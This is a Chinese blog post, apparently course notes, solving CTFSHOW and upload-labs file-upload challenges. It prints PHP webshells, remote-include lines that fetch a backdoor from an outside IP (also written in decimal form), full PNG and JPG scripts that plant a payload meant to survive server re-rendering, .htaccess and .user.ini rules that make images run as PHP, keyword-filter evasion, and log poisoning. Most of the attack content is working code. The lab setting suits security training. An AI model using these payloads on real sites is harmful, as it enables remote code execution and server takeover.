day32WEB 攻防-通用漏洞&文件上传&二次渲染&.htaccess&变异免杀

最新推荐文章于 2024-06-04 14:04:24 发布
最新推荐文章于 2024-06-04 14:04:24 发布
阅读量1.2k 收藏 16
点赞数 32
分类专栏: 小迪安全-2022年 文章标签: 前端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_69583059/article/details/135838425
版权
本章节知识点:
1 、文件上传 - 二次渲染
2 、文件上传 - 简单免杀变异
3 、文件上传 -.htaccess 妙用
4 、文件上传 -PHP 语言特性
前置知识:
后门代码需要用特定格式后缀解析,不能以图片后缀解析脚本后门代码 ( 解析漏洞除外 )
如: jpg 图片里面有 php 后门代码,不能被触发,所以连接不上后门
如果要图片后缀解析脚本代码,一般会利用包含漏洞或解析漏洞,还 有.user.ini&.htaccess

.htaccess文件只能用于apahce,不能用于iisnginx等中间件

.user.ini只能用于Server APIFastCGI模式下,而正常情况下apache不是运行在此模块下的。

文件二次渲染:
1 、判断上传前和上传后的文件大小及内容
2 、判断上传后的文件返回数据包内容
CTFSHOW-文件上传-162 到 170 关卡

162 突破.过滤

过滤 . () {} ;
解题思路:通过.user.ini包含png文件,png文件包含远程可执行文件  
 <?=include'http://82.156.153.203/index.txt'?>
将后门代码写在index.txt文件里面,但是 .号也被过滤了,显然这样是不行的,这里我们要将IP地址转换成数字,这样就不存在 .
利用远程包含 IP 转换地址后调用执行 
.user.ini :GIF89a auto_prepend_file=png
png: GIF89a <?=include'http://1385994699/';?>

163 突破上传删除

过滤 . () {} ; 等 同时文件被删除,png上传成功后会自动删除
1,什么都删除
2,有后门代码就删除
解决办法:
1,可以利用条件竞争:在上传成功后,立马访问,创建型代码(代码被执行后重新创建一个 文件)
2,直接利用.user.ini 包含远程 
GIF89a auto_prepend_file=http://1385994699/

GIF二次渲染

upload-labs靶场第17关:这一关对上传图片进行了判断了后缀名content-type以及利用imagecreatefromgif判断是否为gif图片,最后再做了一次二次渲染

实验所用GIF图片:https://wwe.lanzoui.com/iFSwwn53jaf

实验所用16进制编码器:

链接:https://pan.baidu.com/s/1ovltmHJvuNvzySELsuCEKg?pwd=hy4e 
提取码:hy4e 

将上传成功之后的图片下载

将上传的图片和上传后的图片用16进制编辑器打开,发现两张图片有些地方不一样,明明是同一张图片,为什么会不一样,因为我们将图片上传后,后台对它进行了二次渲染,导致了一些内容的改变。这样就可能导致我们长传的图片马失效,因为写后门代码的地方可能会被处理。

我们尝试将后门代码<?=eval($_POST[pass]);?>写在文件头部,然后保存重新上传。

上传成功之后再次打开发现后门代码不见了。

再次尝试将后门代码写到文件尾部。

然后打开上传之后的图片,在文件头不发现了后门代码,并没有删除。

然后上传.user.ini文件,用.user.ini包含a1118962020.gif,尝试用哥斯拉连接

164 png 二次渲染 

手工虽然也能够绕过二次渲染,但是几率不大,运气不好的时候可能要多次尝试

这里建议用脚本注入后门,这样绕过的几率会大一些

png绕过代码:

<?php

$p = array(0xa3, 0x9f, 0x67, 0xf7, 0x0e, 0x93, 0x1b, 0x23,
           0xbe, 0x2c, 0x8a, 0xd0, 0x80, 0xf9, 0xe1, 0xae,
           0x22, 0xf6, 0xd9, 0x43, 0x5d, 0xfb, 0xae, 0xcc,
           0x5a, 0x01, 0xdc, 0x5a, 0x01, 0xdc, 0xa3, 0x9f,
           0x67, 0xa5, 0xbe, 0x5f, 0x76, 0x74, 0x5a, 0x4c,
           0xa1, 0x3f, 0x7a, 0xbf, 0x30, 0x6b, 0x88, 0x2d,
           0x60, 0x65, 0x7d, 0x52, 0x9d, 0xad, 0x88, 0xa1,
           0x66, 0x44, 0x50, 0x33);
$img = imagecreatetruecolor(32, 32);

for ($y = 0; $y < sizeof($p); $y += 3) {
   $r = $p[$y];
   $g = $p[$y+1];
   $b = $p[$y+2];
   $color = imagecolorallocate($img, $r, $g, $b);
   imagesetpixel($img, round($y / 3), 0, $color);
}

imagepng($img,'1.png');  //要修改的图片的路径
/* 木马内容
<?$_GET[0]($_POST[1]);?>
 */

?>
将要修改的图片放在代码同目录,然后运行即可
get 0=system
post 1=tac flag.php

165 jpg 二次渲染

jpg绕过代码:

<?php
    $miniPayload = "<?=eval(\$_POST[1]);?>";


    if(!extension_loaded('gd') || !function_exists('imagecreatefromjpeg')) {
        die('php-gd is not installed');
    }

    if(!isset($argv[1])) {
        die('php jpg_payload.php <jpg_name.jpg>');
    }

    set_error_handler("custom_error_handler");

    for($pad = 0; $pad < 1024; $pad++) {
        $nullbytePayloadSize = $pad;
        $dis = new DataInputStream($argv[1]);
        $outStream = file_get_contents($argv[1]);
        $extraBytes = 0;
        $correctImage = TRUE;

        if($dis->readShort() != 0xFFD8) {
            die('Incorrect SOI marker');
        }

        while((!$dis->eof()) && ($dis->readByte() == 0xFF)) {
            $marker = $dis->readByte();
            $size = $dis->readShort() - 2;
            $dis->skip($size);
            if($marker === 0xDA) {
                $startPos = $dis->seek();
                $outStreamTmp = 
                    substr($outStream, 0, $startPos) . 
                    $miniPayload . 
                    str_repeat("\0",$nullbytePayloadSize) . 
                    substr($outStream, $startPos);
                checkImage('_'.$argv[1], $outStreamTmp, TRUE);
                if($extraBytes !== 0) {
                    while((!$dis->eof())) {
                        if($dis->readByte() === 0xFF) {
                            if($dis->readByte !== 0x00) {
                                break;
                            }
                        }
                    }
                    $stopPos = $dis->seek() - 2;
                    $imageStreamSize = $stopPos - $startPos;
                    $outStream = 
                        substr($outStream, 0, $startPos) . 
                        $miniPayload . 
                        substr(
                            str_repeat("\0",$nullbytePayloadSize).
                                substr($outStream, $startPos, $imageStreamSize),
                            0,
                            $nullbytePayloadSize+$imageStreamSize-$extraBytes) . 
                                substr($outStream, $stopPos);
                } elseif($correctImage) {
                    $outStream = $outStreamTmp;
                } else {
                    break;
                }
                if(checkImage('payload_'.$argv[1], $outStream)) {
                    die('Success!');
                } else {
                    break;
                }
            }
        }
    }
    unlink('payload_'.$argv[1]);
    die('Something\'s wrong');

    function checkImage($filename, $data, $unlink = FALSE) {
        global $correctImage;
        file_put_contents($filename, $data);
        $correctImage = TRUE;
        imagecreatefromjpeg($filename);
        if($unlink)
            unlink($filename);
        return $correctImage;
    }

    function custom_error_handler($errno, $errstr, $errfile, $errline) {
        global $extraBytes, $correctImage;
        $correctImage = FALSE;
        if(preg_match('/(\d+) extraneous bytes before marker/', $errstr, $m)) {
            if(isset($m[1])) {
                $extraBytes = (int)$m[1];
            }
        }
    }

    class DataInputStream {
        private $binData;
        private $order;
        private $size;

        public function __construct($filename, $order = false, $fromString = false) {
            $this->binData = '';
            $this->order = $order;
            if(!$fromString) {
                if(!file_exists($filename) || !is_file($filename))
                    die('File not exists ['.$filename.']');
                $this->binData = file_get_contents($filename);
            } else {
                $this->binData = $filename;
            }
            $this->size = strlen($this->binData);
        }

        public function seek() {
            return ($this->size - strlen($this->binData));
        }

        public function skip($skip) {
            $this->binData = substr($this->binData, $skip);
        }

        public function readByte() {
            if($this->eof()) {
                die('End Of File');
            }
            $byte = substr($this->binData, 0, 1);
            $this->binData = substr($this->binData, 1);
            return ord($byte);
        }

        public function readShort() {
            if(strlen($this->binData) < 2) {
                die('End Of File');
            }
            $short = substr($this->binData, 0, 2);
            $this->binData = substr($this->binData, 2);
            if($this->order) {
                $short = (ord($short[1]) << 8) + ord($short[0]);
            } else {
                $short = (ord($short[0]) << 8) + ord($short[1]);
            }
            return $short;
        }

        public function eof() {
            return !$this->binData||(strlen($this->binData) === 0);
        }
    }
?>

166 zip 调用包含 

直接上传 zip 后修改代码
<?=eval($_POST[x]);?>

167 .htaccess 妙用

.htaccess 默认不支持 nginx ,支持apache,设置后支持nginx
.htaccess 可以通过设置实现文件解析配置
.png 后缀的文件解析成 php 
(1)SetHandler 指令
# 将images.png 当做 PHP 执行
<FilesMatch  "images.png">
SetHandler  application/x-httpd-php
</FilesMatch>

(2)AddType

# 将 .jpg(.xxx) 当做 PHP 文件解析
AddType application/x-httpd-php .jpg(.xxx)
upload-labs靶场第四关
上传text.png
上传.htaccess文件

168 免杀后门

可以上传php文件,但是后门代码会限制,过滤了一些关键词,eval,system等

将system拆分,然后直接读取对应文件

<?php $a='syste';$b='m';$c=$a.$b;$c('tac ../flaga.php');?>

169 170 日志包含

构造 .user.ini 利用条件:目录要有首页文件, index.php(首页指向文件)  内容随意
目录没有首页文件,可以让.user.ini包含日志文件,将后门代码写入到日志文件 
上传.user.ini 包含日志:auto_prepend_file=/var/log/nginx/access.log

aozhan001
关注
  • 32
    点赞
  • 16
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
通过配置.htaccess文件实现子目录绑定二级域名的方法
09-11
.htaccess文件 子目录绑定二级域名
任意文件-(一).htaccess文件
05-10
用于利用某些Web服务器(尤其是Apache)的配置漏洞,以实现更高级的文件攻击或执行其他恶意操作。 文件类型解析:通过.htaccess修改服务器配置,可以让服务器将特定类型的文件当作PHP或其他可执行脚本处理。例如...
upload靶场第十七关 二次渲染绕过 jpg格式
2301_79650865的博客
02-09 381
upload靶场第十七关 二次渲染绕过 jpg格式,详细教程
文件常用绕过方式
weixin_43077878的博客
04-02 1139
1.前端。
32、WEB攻防——通用漏洞&文件&二次渲染&.htaccess&变异
qq_55202378的博客
01-22 689
进行php环境配置,当然访问的php文件需要对php环境进行配置,支持。需要配合文件包含漏洞,如果没有文件包含漏洞,需要使用。限制中间件类型(默认支持apache)。不能写带文件后缀的文件名;
文件之路之六:绕过图片二次渲染
weixin_62715196的博客
08-15 726
绕过图片二次渲染文件的一种类型
文件绕过】--二次渲染
nareku的博客
04-07 8313
二次渲染原理 在我们上文件后,网站会对图片进行二次处理(格式、尺寸,保存,删除 要求等),服务器会把里面的内容进行替换更新,处理完成后,根据我们原有的图片生成一个新的图片(标准化)并放到网站对应的标签进行显示。 绕过方法 1.配合条件竞争漏洞 ...
upload-lab-17 -二次渲染绕过
xlvbys的博客
09-06 243
用010Editor编辑器进行对比两个GIF图片内容,找到相同的地方(指的是上前和上后,两张图片的部分Hex仍然保持不变的位置)并插入PHP一句话,为了方便大家测试,这里提供一张网上某个大佬提供的GIF图片,当时我也找了很久,大家可以保存一下https://wwe.lanzoui.com/iFS。最后再做了一次二次渲染,但是后端二次渲染需要找到渲染后的图片里面没有发生变化的Hex地方,get参0=assert 加上 post参1=phpinfo();上正常的GIF图片下载回显的图片,
WEB攻防-通用漏洞&文件&二次渲染&.htaccess&变异
m0_65336233的博客
10-12 1034
WEB攻防-通用漏洞&文件&二次渲染&.htaccess&变异
nginx支持.htaccess文件实现伪静态的方法分享
01-20
在Google上搜索的资料很多人都说nginx目前不支持.htaccess文件,我按照nginx的规则试验了一下,结果发现nginx是完全支持.htaccess文件的! 方法如下: 1. 在需要使用.htaccess文件的目录下新建一个.htaccess文件, ...
Apache服务器中.htaccess文件的实用配置示例集锦
09-10
主要介绍了Apache服务器中.htaccess文件的实用配置示例集锦,囊括了防盗链重定向及强制浏览器下载指定的文件类型等例子,很黄很暴力,需要的朋友可以参考下
web.config(IIS)和.htaccess(Apache)配置
09-09
些是我发现最有用的片段,/随时间推移使用最多的片段。 他们处理诸如从查询字符串,CORS标头重写URL以及强制HTTPS重定向之类的事情
【后端检测-绕过】文件头检测绕过、二次渲染绕过
07-03 5168
【后端检测-绕过】
图片码二次渲染绕过
m0_59049258的博客
09-10 671
以upload-labs靶场第十七关为例。
文件绕过】——二次渲染漏洞
热门推荐
weixin_45588247的博客
07-28 1万+
copy a.png /b + a.php /a 1.png: http://www.xue51.com/soft/47175.html =================================================== 1. png图片组成:   png图片由3个以上的数据块组成。   PNG定义了两种类型的数据块,一种是称为关键数据块(critical chunk),这是标准的数据块,另一种叫做辅助数据块(ancillary chunks),这是可选的数据块。   关键数据块定义
漏洞靶场】文件后端检测二次渲染绕过--upload-labs
m0_46344990的博客
05-06 1610
一、漏洞描述 在upload-labs第十七关使用了了二次渲染的方法对图片作了处理,将上的png,jpg,gif图片进行尺寸等操作做成新图片。可以通过不同文件格式的特性对图片做处理,让服务端不改变插入语句的位置,然后再用文件包含的漏洞利用。这里详细对gif格式做处理。 二、漏洞发现 先在本地写php脚本若上成功,且知道上文件在网站保存的路径,可通过网页访问获得服务器配置信息,命名为z.php。但是在这里不能用php文件直接上,需要制作图片马来绕过服务器检测文件二进制头信息。 有两种方法,但
网安之web攻防第三十二天
B_l_a_nk的博客
04-06 126
#前置: 后门代码需要用特定格式后缀解析,不能以图片后缀解析脚本后门代码(解析漏洞除外) 如:jpg图片里面有php后门代码,不能被触发,所以连接不上后门 如果要图片后缀解析脚本代码,一般会利用包含漏洞或解析漏洞,还有.user.ini&.htaccess
【upload靶场17-21】二次渲染、条件竞争、黑白名单绕过
07-20 815
【upload靶场】
浏览器阻止屏幕息屏,js阻止浏览器息屏,Web网页阻止息屏
最新发布
lianmindiandi
06-04 175
比如打开一个浏览器页面(比如大屏),想让它一直显示着,而不是过几分钟不操作就屏幕黑了.(电脑有设置电脑不操作就会多长时间就会息屏睡眠,如果要求每个客户都去操作一下电脑设置一下从不睡眠,这很不友好和现实.而且我也只想客户在大屏的时候才这样,其他页面就正常,按电脑设定走)如果想看看效果,可以试试,最好把电脑息屏改成1分钟,要不然等太久了, 累啊…(除非等待时间玩把手游😁)这是看了前端css大佬张鑫旭写的一波文章,观后有感😄,如果大家不认识,百度一波。是不是很简单,但是这里面还有一些注意点,
.htaccess文件漏洞复现
06-03
请注意,.htaccess文件本身并不会造成上漏洞,它是一种用于配置Apache服务器的文件。我猜测您的问题是如何利用配置错误或者漏洞.htaccess文件来实现服务器攻击的。 一些常见的.htaccess文件漏洞如下: 1. 目录遍历漏洞: 如果一个服务器上的网站没有正确限制文件的目录,攻击者可以上包含攻击代码的.htaccess文件到网站的某个目录,然后通过访问该目录下的文件来执行攻击代码。 2. 文件名绕过漏洞: 有些服务器在处理上文件名时可能会忽略.htaccess后缀,因此攻击者可以上包含攻击代码的.htaccess文件并将其命名为其他文件类型的后缀名,例如.php、.jpg、.gif等,然后通过访问该文件来执行攻击代码。 3. MIME类型绕过漏洞: 攻击者可以上一个包含攻击代码的.htaccess文件,并在其中设置MIME类型为可执行文件,这样当服务器处理该文件时就会将其作为可执行文件来执行其中的代码。 请注意,这些漏洞都是由于服务器配置错误或者漏洞造成的,因此最好的解决方法是及时更新服务器软件并开启安全防护措施,例如限制上文件的类型、大小、目录等。同时,还应该定期检查服务器配置和日志来发现潜在的安全问题。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值